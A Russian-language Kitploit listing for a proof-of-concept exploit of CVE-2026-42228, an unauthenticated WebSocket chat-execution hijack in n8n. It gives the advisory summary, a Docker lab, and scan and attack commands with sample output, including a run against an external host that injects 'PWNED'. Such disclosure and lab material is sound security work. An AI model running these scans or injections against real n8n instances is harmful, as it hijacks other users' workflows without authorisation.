Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42228 — Эксплойт proof-of-concept для CVE-2026-42228 — уязвимости неаутентифицированного перехвата выполнения чата в n8n, с автоматизированными скриптами сканирования и атаки. | Kitploit
Инструменты/GitHubGitHub/rudsarkar/cve-2026-42228
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubrudsarkar/cve-2026-42228

CVE-2026-42228

Эксплойт proof-of-concept для CVE-2026-42228 — уязвимости неаутентифицированного перехвата выполнения чата в n8n, с автоматизированными скриптами сканирования и атаки.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GHSA-f77h-j2v7-g6mw — n8n Несанкционированный перехват выполнения чата

CVE: CVE-2026-42228
Серьёзность: Высокая
Затронуто: n8n < 1.123.32
Исправлено в: n8n 1.123.32 / 2.17.4 / 2.18.1


Сводка уязвимости

chat-service.ts :: startSession() принимает executionId из строки запроса WebSocket и только проверяет, что выполнение существует в базе данных. Он никогда не проверяет, авторизован ли вызывающий для доступа к этому выполнению.

Неаутентифицированный злоумышленник, который знает (или может перечислить) действительный числовой идентификатор выполнения для выполнения в состоянии ожидания, может:

  1. Подключиться к WebSocket /chat без учётных данных.
  2. Получить ожидающее приглашение, отображаемое легитимному пользователю.
  3. Внедрить произвольный ввод в чат, который возобновляет — и перехватывает — рабочий процесс.

Предварительные условия:

  • Активен публичный рабочий процесс Hosted Chat с Authentication = None.
  • По крайней мере одно выполнение в настоящее время находится в состоянии waiting.
  • Злоумышленник может угадать или перечислить числовой идентификатор выполнения (последовательные целые числа).

Настройка лаборатории

Требования

  • Docker ≥ 24 с Compose v2
  • Порт 5678 свободен на localhost

Настройка одной командой

root@kitploit:~
chmod +x exploit.sh
./exploit.sh setup

Это загружает n8nio/n8n:1.123.22 (последний затронутый релиз), собирает образ злоумышленника и запускает уязвимую цель на http://localhost:5678.


Пошаговое руководство по эксплуатации

1. Настройте уязвимую цель

  1. Откройте http://localhost:5678 и завершите мастер настройки (любые учётные данные).
  2. Создайте новый рабочий процесс.
  3. Добавьте узел Chat Trigger → установите Authentication = None.
  4. Добавьте узел Wait (или любой узел, который приостанавливается для ввода пользователя) после триггера.
  5. Активируйте рабочий процесс.

2. Запустите выполнение в состоянии ожидания

Откройте публичный URL чата, показанный в узле Chat Trigger, и отправьте сообщение. Выполнение перейдёт в состояние waiting, приостановленное до следующего ответа в чате.

3. Сканирование на предмет ожидающих выполнений (без аутентификации)

root@kitploit:~
./exploit.sh scan
# или укажите диапазон:
./exploit.sh scan 1 500

Ожидаемый вывод при обнаружении уязвимого выполнения:

root@kitploit:~
[+] WAITING execution found! exec_id=7
    Server said: 'n8n|continue'
    Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
    [!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'

4. Атака на известный идентификатор выполнения напрямую

root@kitploit:~
./exploit.sh attack 7
# или с пользовательской полезной нагрузкой:
./exploit.sh attack 7 "custom injected message"

5. Наблюдайте за перехватом

Вернувшись в редактор n8n, рабочий процесс возобновляется с внедрённым злоумышленником сообщением вместо ввода легитимного пользователя.


Ручные команды Docker

root@kitploit:~
# Сборка образа злоумышленника
docker build -t n8n-chat-hijack-poc .

# Сканирование (подключение к общей лабораторной сети)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --start-id 1 --end-id 200

# Атака на конкретное выполнение
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --exec-id 7 --inject "PWNED"

# Против внешней цели (флаг сети не требуется)
docker run --rm n8n-chat-hijack-poc \
    --target https://n8n.example.com \
    --exec-id 42 --inject "PWNED"

Очистка

root@kitploit:~
./exploit.sh clean

Останавливает контейнеры и удаляет тома (включая базу данных SQLite).


Файлы

ФайлОписание
poc_GHSA-f77h-j2v7-g6mw.pyАвтономный Python PoC
DockerfileОбраз контейнера злоумышленника

Ссылки

  • GHSA-f77h-j2v7-g6mw
  • Журнал изменений n8n 1.123.32
Скачать инструмент
docker-compose.ymlПолная лаборатория: уязвимый n8n + злоумышленник
exploit.shВспомогательный скрипт для типовых операций